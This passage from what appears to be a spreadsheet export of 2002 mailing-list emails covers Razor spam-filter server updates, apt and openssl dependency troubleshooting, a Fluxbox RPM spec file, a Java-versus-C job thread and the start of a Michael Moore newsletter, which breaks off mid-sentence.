\n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL] \n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL] \n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net \n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net http://vipul.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: caolan@csn.ul.ie (Caolan McNamara)\nDate: Wed, 7 Aug 2002 08:48:23 +0100</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 08:48:23 +0100</t>
  </si>
  <si>
    <t>caolan@csn.ul.ie (Caolan McNamara)</t>
  </si>
  <si>
    <t>On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:\n&gt; \n&gt; Hello,\n&gt; \n&gt; What are your recommendations for buying books (technical and\n&gt; otherwise) online, from Irish or European sellers. Is there \n&gt; anywhere that has as good a selection as, say, Amazon but\n&gt; deals in Euro?\n\namazon.de and amazon.fr ? :-)\n\nC.\n-- \nCaolan McNamara               |  caolan@skynet.ie  \n[URL]http://www.skynet.ie[/URL]  |  +353 86 8161184\nThe way some people find fault, you'd think there was a reward\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.skynet.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Marc Perkel &lt;marc@perkel.com&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Wed, 7 Aug 2002 00:59:53 -0700</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 00:59:53 -0700</t>
  </si>
  <si>
    <t>Vipul Ved Prakash &lt;mail@vipul.net&gt;</t>
  </si>
  <si>
    <t>Marc Perkel &lt;marc@perkel.com&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] False Positives on EFF Messages</t>
  </si>
  <si>
    <t>Marc,\n\nThe likelyhood of EFF or other mailing lists getting filtered will\ndecrease over time as these mails are revoked whenever they get filtered\nout. Revocations help the system to punish reporters who report legit bulk\nmail such that their future reports are automatically considered suspect.\nAs such, with all the new changes to TeS, the likelyhood of filtering\nmailing list posts has decreased dramatically. Please keep me posted if\nyou see false positives on the EFF newsletter again.\n\ncheers,\nvipul.\n\nOn Fri, Aug 02, 2002 at 03:22:13PM -0700, Marc Perkel wrote:\n&gt; Thanks - but it almost looks like someone is deliberately trying to\n&gt; poison EFF messages. If this is so I want to look into it. It's odd that\n&gt; most all the razor errors were people talking about free speech issies\n&gt; and intellectual property. It make me wonder if someone is doing\n&gt; something on purpose.\n&gt;\n&gt; I am also active in the development of Spam Assassin rules. Spam\n&gt; filtering has been a hot topic at EFF for quite some time and is even\n&gt; hotter now that I'm actually using it. For what it's worth - your system\n&gt; is considered to be the cleanest method - but with any system, people at\n&gt; EFF are concerned about free speech issues and that spam filtering can\n&gt; become a censorship issue. One of our newsletters got flagged as spam\n&gt; because it had list removal instructions at the bottom.\n\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://vipul.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>BRA</t>
  </si>
  <si>
    <t>To: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Wed, 7 Aug 2002 00:45:18 -0700</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 00:45:18 -0700</t>
  </si>
  <si>
    <t>Hi,\n\nWe were rolling out changes to TeS and catalogue servers over the last two\ndays. Any glitches you might have experienced would have been due to the\nupgrades. The upgrades are now complete, and things are back to normal.\nSeveral new features in TeS will provide better accuracy, specially with\nregards to false-positives.\n\ncheers,\nvipul.\n\nOn Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:\n&gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks\n&gt; against apt.cloudmark.com.  What is the sync delay between these boxes?\n&gt; \n&gt; -----Original Message-----\n&gt; From: Rose, Bobby \n&gt; Sent: Monday, August 05, 2002 2:05 PM\n&gt; To: ML-razor-users\n&gt; Subject: [Razor-users] What's wrong with the Razor servers now?\n&gt; \n&gt; \n&gt; I noticed a low count of razor'd spam messages. So after digging, if I\n&gt; razor-report a message the diags say that it was accepted but if I turn\n&gt; around and run a check on the exact same message that was reported, then\n&gt; it doesn't find the sig and as such isn't spam.\n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL] _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Peter Peltonen &lt;pisara@iki.fi&gt;\nDate: Wed, 6 Feb 2002 19:44:26 +0200</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 19:44:26 +0200</t>
  </si>
  <si>
    <t>Peter Peltonen &lt;pisara@iki.fi&gt;</t>
  </si>
  <si>
    <t>Re: Apt problems</t>
  </si>
  <si>
    <t>On Wed, Feb 06, 2002 at 04:30:18PM +0200, Harri Haataja wrote: &gt; I have a few such things (with jdk, imlib, kernel DRI version.. &gt; something) and Ive just made dummy packages (with verbose warning &gt; attached ;) that explicitly provide those capabilities. (or claim to, &gt; that is). Hm. One could do this with rpm's --justdb switch too, without having to  make a dummy package, right? I was wondering that this is a bit dangerous if there is a update for my  software, as the dummy package might get updated with it overwriting the  installation I've done from source... Not good. Is there really no "--nodeps" kind of switch in apt-get?  --  Peter _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Peter Peltonen &lt;pisara@iki.fi&gt;\nDate: Wed, 6 Feb 2002 18:51:52 +0200</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 18:51:52 +0200</t>
  </si>
  <si>
    <t>On Wed, Feb 06, 2002 at 04:14:27PM +0100, Matthias Saou wrote: &gt; Strange... all my openssh packages don't explicitly requires a version of &gt; openssl. What version of openssh do you have? Is it an official Red Hat &gt; package? I suppose it isn't, and using Red Hat's rpms will solve your &gt; problem. openssh-3.0.2p1-1 I think that is directly from openssh site. It's from the RH 6.2 that I  upgraded to 7.2 (6.2 doesn't ship with openssh...).  I probably should downgrade to the versoin RH provides except I can't do  that as I don't have physical access to that box and downgrading ssh  packages over ssh doesn't sound like a bright idea... --  Peter _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Peter Peltonen &lt;pisara@iki.fi&gt;\nDate: Wed, 6 Feb 2002 18:47:55 +0200</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 18:47:55 +0200</t>
  </si>
  <si>
    <t>On Wed, Feb 06, 2002 at 04:30:18PM +0200, Harri Haataja wrote: &gt; install. I haven't met an openssh like that and in worst case I've had 3 &gt; different openssl libraries (WTF can't they just bump a major version if &gt; it's incompatible?!?). So, what should I with the openssl thing? &gt; something) and Ive just made dummy packages (with verbose warning &gt; attached ;) that explicitly provide those capabilities. (or claim to, &gt; that is). How do I make such packages? --  Peter _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 6 Feb 2002 17:34:32 +0100</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 17:34:32 +0100</t>
  </si>
  <si>
    <t>Matthias Saou &lt;matthias@egwn.net&gt;</t>
  </si>
  <si>
    <t>Once upon a time, Peter wrote : &gt; On Wed, Feb 06, 2002 at 04:14:27PM +0100, Matthias Saou wrote: &gt; &gt; Strange... all my openssh packages don't explicitly requires a version &gt; &gt; of openssl. What version of openssh do you have? Is it an official Red &gt; &gt; Hat package? I suppose it isn't, and using Red Hat's rpms will solve &gt; &gt; your problem. &gt;  &gt; openssh-3.0.2p1-1 &gt;  &gt; I think that is directly from openssh site. It's from the RH 6.2 that I  &gt; upgraded to 7.2 (6.2 doesn't ship with openssh...).  That explains... &gt; I probably should downgrade to the versoin RH provides except I can't do  &gt; that as I don't have physical access to that box and downgrading ssh  &gt; packages over ssh doesn't sound like a bright idea... Well, with 7.0, I've seen a few problems with doing that, but as of 7.2 it's really wonderful! Ever tried of completely uninstalling all openssh related packages while being connected through ssh? Well, it works!!!! Of course, if the connection cuts at that moment, you're stuck, but a simple upgrade with official Red Hat packages also works like a charm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Harri Haataja &lt;harri.haataja@cs.Helsinki.FI&gt;\nDate: Wed, 6 Feb 2002 16:30:18 +0200</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 16:30:18 +0200</t>
  </si>
  <si>
    <t>Harri Haataja &lt;harri.haataja@cs.Helsinki.FI&gt;</t>
  </si>
  <si>
    <t>--bg08WKrSYDhXBjb5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Feb 06, 2002 at 04:29:53PM +0200, Peter Peltonen wrote: &gt; Two issues: &gt;=20 &gt; ---- &gt; Sorry, but the following packages have unmet dependencies: &gt;   openssh: Depends: openssl (=3D 0.9.5a) but 0.9.6b-8 is installed &gt;   php-pgsql: Depends: postgresql but it is not installed &gt;              Depends: libpq.so.2 &gt; E: Unmet dependencies. Try using -f. &gt; ---- &gt;=20 &gt; 1. I have the following openssl packages installed: &gt;=20 &gt; ---- &gt; openssl-perl-0.9.6b-8 &gt; openssl-0.9.6b-8 &gt; openssl095a-0.9.5a-11 &gt; openssl-devel-0.9.6b-8 &gt; ---- &gt;=20 &gt; The openssl095a package should provide the openssl-0.9.5a compatibility= =20 &gt; but apt doesn't think so?=20 I believe that's just a matter of string parsing. If someone were to fix the openssh package, removing the explicit Requires:, I believe the automagic binary handler would figure the right libraries to use and install. I haven't met an openssh like that and in worst case I've had 3 different openssl libraries (WTF can't they just bump a major version if it's incompatible?!?). &gt; 2. I have postgresql installed from the source. So that's why I need=20 &gt; php-pgsql. Is there a way to tell apt about packages I don't want it to= =20 &gt; complain about? I have a few such things (with jdk, imlib, kernel DRI version.. something) and Ive just made dummy packages (with verbose warning attached ;) that explicitly provide those capabilities. (or claim to, that is). --=20 If you only want to go 500 miles, can you begin with a halfstep? --bg08WKrSYDhXBjb5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see [URL]http://www.gnupg.org[/URL] iD8DBQE8YT35QF8Oi9XNck4RAuNpAJ90B0EUZ7Lkqpr+KYzWPRi+i4DcWACdHQd5 Tb0GZvVivaW1rOzqP/Su9Gc= =h7Ff -----END PGP SIGNATURE----- --bg08WKrSYDhXBjb5-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.gnupg.org http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Peter Peltonen &lt;pisara@iki.fi&gt;\nDate: Wed, 6 Feb 2002 16:29:53 +0200</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 16:29:53 +0200</t>
  </si>
  <si>
    <t>Apt problems</t>
  </si>
  <si>
    <t>Two issues: ---- Sorry, but the following packages have unmet dependencies:   openssh: Depends: openssl (= 0.9.5a) but 0.9.6b-8 is installed   php-pgsql: Depends: postgresql but it is not installed              Depends: libpq.so.2 E: Unmet dependencies. Try using -f. ---- 1. I have the following openssl packages installed: ---- openssl-perl-0.9.6b-8 openssl-0.9.6b-8 openssl095a-0.9.5a-11 openssl-devel-0.9.6b-8 ---- The openssl095a package should provide the openssl-0.9.5a compatibility  but apt doesn't think so?  2. I have postgresql installed from the source. So that's why I need  php-pgsql. Is there a way to tell apt about packages I don't want it to  complain about? --  Peter _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 6 Feb 2002 16:14:27 +0100</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 16:14:27 +0100</t>
  </si>
  <si>
    <t>Once upon a time, Harri wrote : &gt; On Wed, Feb 06, 2002 at 04:29:53PM +0200, Peter Peltonen wrote: &gt; &gt; Two issues: &gt; &gt;  &gt; &gt; ---- &gt; &gt; Sorry, but the following packages have unmet dependencies: &gt; &gt;   openssh: Depends: openssl (= 0.9.5a) but 0.9.6b-8 is installed &gt; &gt;   php-pgsql: Depends: postgresql but it is not installed &gt; &gt;              Depends: libpq.so.2 &gt; &gt; E: Unmet dependencies. Try using -f. &gt; &gt; ---- &gt; &gt;  &gt; &gt; 1. I have the following openssl packages installed: &gt; &gt;  &gt; &gt; ---- &gt; &gt; openssl-perl-0.9.6b-8 &gt; &gt; openssl-0.9.6b-8 &gt; &gt; openssl095a-0.9.5a-11 &gt; &gt; openssl-devel-0.9.6b-8 &gt; &gt; ---- &gt; &gt;  &gt; &gt; The openssl095a package should provide the openssl-0.9.5a compatibility &gt; &gt; but apt doesn't think so?  &gt;  &gt; I believe that's just a matter of string parsing. If someone were to fix &gt; the openssh package, removing the explicit Requires:, I believe the &gt; automagic binary handler would figure the right libraries to use and &gt; install. I haven't met an openssh like that and in worst case I've had 3 &gt; different openssl libraries (WTF can't they just bump a major version if &gt; it's incompatible?!?). Strange... all my openssh packages don't explicitly requires a version of openssl. What version of openssh do you have? Is it an official Red Hat package? I suppose it isn't, and using Red Hat's rpms will solve your problem. What you need to know for openssl is : 0.9.5b is libcrypto.so.0 and libssl.so.0 0.9.6  is libcrypto.so.1 and libssl.so.1 0.9.6b is libcrypto.so.2 and libssl.so.2 Now in all Red Hat packages I've seen so far, the only dependency is on those files and not on "openssl = version". Matthias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Nick Verhaegen &lt;nick@permflux.org&gt;\nDate: Wed, 4 Sep 2002 23:56:48 +0200</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 23:56:48 +0200</t>
  </si>
  <si>
    <t>Nick Verhaegen &lt;nick@permflux.org&gt;</t>
  </si>
  <si>
    <t>Re: Fluxbox</t>
  </si>
  <si>
    <t>--------------Boundary-00=_OYOXHTVA0T2X8R5S233Y Content-Type: text/plain;   charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, =09I made a spec file for it some weeks ago, maybe it can be included in = fresh.=20 If not,  at least you can use it... I'm attaching it here... Hope it might be some use for you, does the trick for me. Might be an old= =20 version though, but should still work Nick On Wednesday 04 September 2002 21:00, Doug Stewart wrote: &gt; I've noted that there are packaged versions of &gt; Blackbox and hackedbox available from FreshRPMs.  What &gt; about FluxBox? [URL]http://fluxbox.sf.net[/URL] &gt; &gt; I'd certainly enjoy a packaged version, since its &gt; creators seem hesitant to provide .rpms (.debs, yes, &gt; but no .rpms). &gt; &gt; .Doug &gt; &gt; __________________________________________________ &gt; Do You Yahoo!? &gt; Yahoo! Finance - Get real-time stock quotes &gt; [URL]http://finance.yahoo.com[/URL] &gt; &gt; _______________________________________________ &gt; RPM-List mailing list  &gt; [URL]http://lists.freshrpms.net[/URL] --------------Boundary-00=_OYOXHTVA0T2X8R5S233Y Content-Type: text/plain;   charset="iso-8859-1";   name="fluxbox.spec" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="fluxbox.spec" Summary: Blackbox derived window manager Name: fluxbox Version: 0.1.10 Release: nv1 License: other Group: User Interface/Desktops Source: [URL]http://prdownloads.sourceforge.net[/URL]{name}-%{version}.tar.gz URL: [URL]http://fluxbox.sourceforge.net[/URL] BuildRoot: %{_tmppath}/%{name}-root BuildRequires: XFree86-devel, libstdc++-devel %description Fluxbox is yet another windowmanager for X. It's based on the Blackbox 0.61.1 code. Fluxbox looks like blackbox and  handles styles, colors, window placement and similar thing exactly like  blackbox (100% theme/style compability). Many changes and improvements have been made to the code, such as window tabs,  iconbar, native keygrabber, gnome and kde support etc. %prep %setup -q %build %configure --enable-xinerama --enable-gnome --enable-kde make %install rm -rf %{buildroot} %makeinstall %clean rm -rf %{buildroot} %files %defattr(-, root, root) %doc README NEWS COPYING AUTHORS INSTALL TODO doc/Coding_style %{_bindir}/* %{_datadir}/%{name} %{_mandir}/man1/* %changelog * Thu Jul 19 2002 Nick Verhaegen - Update to 0.1.10 * Tue Jul 9 2002 Nick Verhaegen - Initial RPM release. --------------Boundary-00=_OYOXHTVA0T2X8R5S233Y-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://fluxbox.sf.net http://finance.yahoo.com http://lists.freshrpms.net http://prdownloads.sourceforge.net http://fluxbox.sourceforge.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Wed, 4 Sep 2002 21:59:28 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 21:59:28 -0500 (CDT)</t>
  </si>
  <si>
    <t>CDale &lt;cdale@techmonkeys.net&gt;</t>
  </si>
  <si>
    <t>Re: Ouch...</t>
  </si>
  <si>
    <t>Someone needs to tell the mayor about this:\n[URL]http://www.cb-2000.com[/URL]\nkinkily yours,\nCindy\n\nOn Wed, 4 Sep 2002, Adam L. Beberg wrote:\n\n&gt; Shouldn't a politician know not to tell the truth? Odds he's impeached by\n&gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]\n&gt; \n&gt; Ouch. Ouch. Ouch.\n&gt; \n&gt; ------------\n&gt; \n&gt; Get Sexier, Keep Husbands, Mayor Tells Wives\n&gt; Wed Sep 4, 9:14 AM ET\n&gt; \n&gt; MISSAGLIA, Italy (Reuters) - Husband's eyes wandering? Make yourself sexier.\n&gt; At least that's the solution proposed by an Italian mayor -- and a woman\n&gt; mayor at that.\n&gt; \n&gt; Wives in the northern town of Missaglia had complained to mayor Marta\n&gt; Casiraghi about a young woman who sunbathed topless on her terrace.\n&gt; \n&gt; They complained that the men in the town of some 7,000 people were spending\n&gt; too much time ogling, so they asked Casiraghi to order the woman to put her\n&gt; clothes back on.\n&gt; \n&gt; But the mayor, far from sympathizing, told the wives to get sexy if they\n&gt; wanted to keep their men. "The girl was very pretty and was soaking up some\n&gt; sun. Topless sunbathing is largely tolerated and widespread nowadays.\n&gt; There's nothing we can do," Casiraghi told Il Nuovo, a web-based newspaper.\n&gt; \n&gt; "Instead, I'd advise the wives to play their rival at her own game -- make\n&gt; themselves more beautiful."\n&gt; \n\n-- \n"I don't take no stocks in mathematics, anyway" --Huckleberry Finn</t>
  </si>
  <si>
    <t>http://www.cb-2000.com</t>
  </si>
  <si>
    <t>CAN</t>
  </si>
  <si>
    <t>To: "'fork@spamassassin.taint.org'" &lt;fork@spamassassin.taint.org&gt;\nFrom: Sherry Listgarten &lt;sherry@timesten.com&gt;\nDate: Wed, 4 Sep 2002 19:58:36 -0700</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 19:58:36 -0700</t>
  </si>
  <si>
    <t>Sherry Listgarten &lt;sherry@timesten.com&gt;</t>
  </si>
  <si>
    <t>"'fork@spamassassin.taint.org'" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: Java is for kiddies</t>
  </si>
  <si>
    <t>Misc rants about finding jobs, java vs C, what makes a good programmer, etc. Okay, hmm, I thought twice about this, but what the hey, jobs are hard to come by. There's a company hiring in Mountain View, looking for a few good hackers, no Java, no GUI, not even C++ -- just C and Linux and networking and good old stuff like that. They just raised a wad of money and they're looking for a few "really good programmers", says the CTO. I know him -- very smart guy. Drives too fast, though, for what that's worth. Joe Bob says "check it out". I'd be happy to pass on your resume, or you can send it straight to them. Probably won't matter if I pass it on, since I don't know you guys anyway... [URL]http://www.netli.com[/URL] -- Sherry. &gt; -----Original Message----- &gt; From: Joseph S. Barrera III [mailto:joe@barrera.org] &gt; Sent: Tuesday, August 27, 2002 8:58 AM &gt; To: Adam L. Beberg &gt; Cc: fork@spamassassin.taint.org &gt; Subject: Re: Java is for kiddies &gt;  &gt;  &gt; Adam L. Beberg wrote: &gt;  &gt;&gt;&gt; Forwarding me stuff from a list is hardly handing me a job. &gt;  &gt;&gt; &gt;  &gt;&gt; I was talking about the open reqs at Kana (the company I  &gt; work for). &gt;  &gt;&gt;  Oh, but programming in Java is beneath you. &gt;  &gt; &gt;  &gt; Nope just lacking years and years of it. For some silly  &gt; reason people &gt;  &gt; always want things to be reliable, fast, and  &gt; cross-platform so all my &gt;  &gt; employers have forced me to code in C :) &gt;  &gt; C is more reliable than Java?? &gt;  &gt; As for cross-platform, C exists on more platforms, but a Java program &gt; is much easier to move from one platform to another. So I'm not sure &gt; what you mean. &gt;  &gt; I'm not trying to fight a language war, but I'm puzzled by the depth &gt; of your anti-Java hatred. &gt;  &gt;  &gt; I know lots of high school &gt;  &gt; kiddies with plenty of Java tho, not having to teach people about &gt;  &gt; pointers or optimization or anything shaves years off the  &gt; coder boot &gt;  &gt; time. I'll send them your way when they graduate. &gt;  &gt; Pointers. So a language has to have pointers to be real? And  &gt; references &gt; don't count, I gather. What's so great about pointers? Why do you &gt; miss them? If your doing embedded stuff, fine, yes, you need the &gt; performance and control over memory that C provides. Probably. &gt; But if your implementing tier N-1 of a tier N system, and pounding &gt; against a database, then Java is OFTEN a very reasonable choice. &gt; Especially if you want that system to run without leaking memory. &gt;  &gt; Optimization. Who says you can't optimize Java? I can and have, &gt; and there are good tools that allow you to do it (I use OptimizeIt). &gt; But usually I find myself optimizing (reducing) database accesses &gt; instead. I sped one part of the system up by a factor of ten by &gt; grouping more operations into fewer transactions. &gt;  &gt; But this is beside the point. If you have decent C++ experience, and &gt; have poked around in Java, you should be able to convince most &gt; employers that you can be trusted writing Java. That's what I did -- &gt; I mean, I joined Kana from Microsoft, and I didn't exactly write &gt; a lot of Java code at Microsoft. &gt;  &gt;  &gt; I'm not displeased you're trying to help, just frustrated that &gt;  &gt; employers can demand such rediculous combinations of skills with &gt;  &gt; insane years of experience. &gt;  &gt; I don't think I've ever interviewed at a place where I actually &gt; met all the prerequisites. Do you just give up when you don't? &gt;  &gt;  &gt; Interview tommorow with Kodak, doing I have no idea what as the &gt;  &gt; recruiter isnt even sure, but cross your fingers it wont require 10 &gt;  &gt; years of Java and 5 years of Windows/IA-64's device driver  &gt; experience &gt;  &gt; (both common requirements). &gt;  &gt; I wish you best of luck, and I apologies for being a bitch. &gt; But God DAMN, you piss me off sometimes. My son occasionally &gt; displays your "can't-do" attitude and I do my damnest to &gt; get him to reverse course. &gt;  &gt; - Joe &gt;  &gt;</t>
  </si>
  <si>
    <t>http://www.netli.com</t>
  </si>
  <si>
    <t>To: "kerry nice" &lt;mothlight@fastmail.fm&gt;\nFrom: "Michael Moore's Mailing List" &lt;mailinglist@michaelmoore.com&gt;\nDate: Wed, 4 Sep 2002 18:23:28 -0400</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 18:23:28 -0400</t>
  </si>
  <si>
    <t>"Michael Moore's Mailing List" &lt;mailinglist@michaelmoore.com&gt;</t>
  </si>
  <si>
    <t>"kerry nice" &lt;mothlight@fastmail.fm&gt;</t>
  </si>
  <si>
    <t>On The Way to Telluride, On My Way Back to the World</t>
  </si>
  <si>
    <t>On The Way to Telluride, On My Way Back to the World\n\n8/29/02\n\nDear friends,\n\nI go to turn my computer on but I have forgotten where the on/off switch\nis. I have had this laptop for three years, but I haven't turned it on for\nthe past two months. I look on its left side, I feel around the back, I\nfind it on the right and I feel like an idiot. The screen reads "fatal\nerror" and offers to "save" whatever I had typed on it last June 21st, a\nfew weeks before my mother died. I hit CTL.ALT.DEL. and it is gone. Gone.\nGone like this long, sad, summer, frozen now, and nothing seemingly matters\nbut everything matters more now than ever before. Why did she have to die?\nWhen will this pain stop? \n\nI got up this morning to fly out to Colorado. The Telluride Film Festival\nis screening my film tomorrow night, the first time it will be shown in the\nUnited States. My mother did not get to see this new film. She was always\nso proud of everything I did, cheering me on every day from the day where\nmy memory begins. I had shown an early cut of the film to my friends last\nwinter in my parent's living room, and mom would come in and out of the\nroom, catching a scene here and there, saying, "Boy, that's something,\nisn't it!" \n\nI don't feel right, right now. I have avoided most people for the past two\nmonths. I can't conceive in my mind having to face a crowd of strangers, no\nmatter how supportive or appreciative they may be. Everyone says to me it\nwill be good to get back to work, good to be busy, take my mind off my\nsadness, as if not aware that what I really might need is for it to be the\nother way around. At my family's insistence, I tried going on TV a few\nweeks ago to talk about the corporate crooks roaming our great land. I had\ndecided to give it a try, and gave it my best shot, and ended up feeling so\nempty and more alone. I had agreed to go on "Crossfire" and Donahue (thank\nGod for this guy!) on the condition that I would not have to have one of\nthose stupid cable news shouting matches with three rightwingnuts where no\none can hear (or wants to hear) what's being said. \n\nThey agreed to the terms, but as Bob Novak asked his first question about\naren't my true motives to destroy capitalism and make America a socialist\ncountry, I just sat there for a moment and didn't respond. I thought I\nwould just take the microphone off and leave - who needs these f-----s! -\nbut then, my dad was with me in the studio and I looked over at him and\nsmiled, and then into the camera I said, yes, Bob, that is exactly what I\nintend to do and, considering more people have bought my book than any\nother nonfiction book in America this year, I guess that means that the\nmajority of Americans agree with me on this point, so look out Bob 'cause\nwe're going to seize your money first! I asked the studio audience in DC\nfor a show of hands of all those who agreed and I was later told that\nnumerous hands shot up in the air, much to the chagrin of a stunned Bob\nNovak. I also added that I thought the Pope was onto something when he said\nthat capitalism is a "sin."\n\nMy dad liked that. He is a sweet, strong, smart man and I loved the drive\nwith him back home. We took a spin through the Michigan State campus and he\ntold me how he had come down here after World War II to inquire about going\nto college but thought it best to return to the assembly line where he had\na secure job. His years during the war serving in the Marines were going to\nbe counted toward his seniority. And so he worked the spark plug and oil\nfilter assembly line for 33 years and provided for mom and us kids and gave\nus all his love -- which, of course, mattered the most. \n\n                      *        *       *       *       *        *\n\nDad took me to the airport this morning, remarking on the way how much mom\nwould have enjoyed this simple trip across town to Bishop Airport, how\nhappy she would have been knowing that I was heading off on a new journey\nin my very fortunate life. I thought about how she came to New York for the\nscreening of "Roger &amp; Me" at the New York Film Festival in 1989, and how I\ngot to introduce her and my aunt as they sat in the front of the balcony,\nand how mom and Aunt Lois stood and took a long Lincoln Center bow, and how\nI stood on that stage and felt that she deserved every bit of that applause\nand more. \n\nIt's a bittersweet memory now, as I've just found out that the NYFF\nselection committee this year is too afraid to show my new film.\n"Politics," is what I have been told. Too "populist" for the new elite who\nnow sit in judgment of what is art. "They don't want to help further your\nplatform Mike," a person close to the committee tells me. "One of them even\nsaid, 'I know this film is going to be popular - and I don't personally\nwant to contribute to its popularity.'"  So, it was decided that "Bowling\nfor Columbine," a Cannes prize-winner, knighted by the Chicago Tribune as\n"one of the most effective political/polemical films ever," a film chosen\nby every single film festival around the world this fall - no, this film\nmust not be shown at Lincoln Center just six blocks from the edit room\nwhere we made it... 77 blocks north of ground zero. I've gone too far this\ntime, cut too close to the bone, stuck my lens where it doesn't belong -\nright straight through the heart of an America that is both master and\nvictim of the ultra-violence. It is so sad to see this place where I will\nalways remember my mother taking that bow now cowering to the whims of neos\nwho, like their counterparts in Hollywood, preside over the demolition of a\nonce great art form.\n\n                     *      *      *      *      *      *      *\n\nMy dad drops me off and goes to park in the short-term lot. He comes inside\njust as the 